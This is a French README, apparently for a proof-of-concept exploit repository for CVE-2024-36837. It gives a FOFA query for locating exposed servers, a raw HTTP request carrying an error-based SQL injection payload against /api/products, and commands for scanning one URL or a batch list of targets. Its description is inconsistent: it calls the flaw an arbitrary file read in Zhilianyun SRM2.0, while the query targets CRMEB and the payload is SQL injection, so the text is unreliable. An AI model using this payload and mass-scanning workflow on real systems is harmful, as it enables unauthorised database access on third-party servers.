
Exploit de preuve de concept pour CVE-2024-36837, une vulnérabilité de lecture de fichier arbitraire non authentifiée dans Zhilianyun SRM2.0. Inclut le scan par lot et le test sur une seule cible via un script Python.
Syntaxe fofa : body="/wap/first/zsff/iconfont/iconfont.css" || body="CRMEB"
GET /api/products?limit=20&priceOrder&salesOrder&selectId=GTID_SUBSET(CONCAT(0x7e,(SELECT+(ELT(3550=3550,md5(9753165)))),0x7e),3550) HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1.2 Safari/605.1.15 Connection: close Accept: / Accept-Language: en Accept-Encoding: gzip
python 11.py
python cve.py -h
L'URL dans url.txt doit commencer par http:// ou https:// python cve.py -f url.txt
L'URL doit commencer par http:// ou https:// python cve.py -u url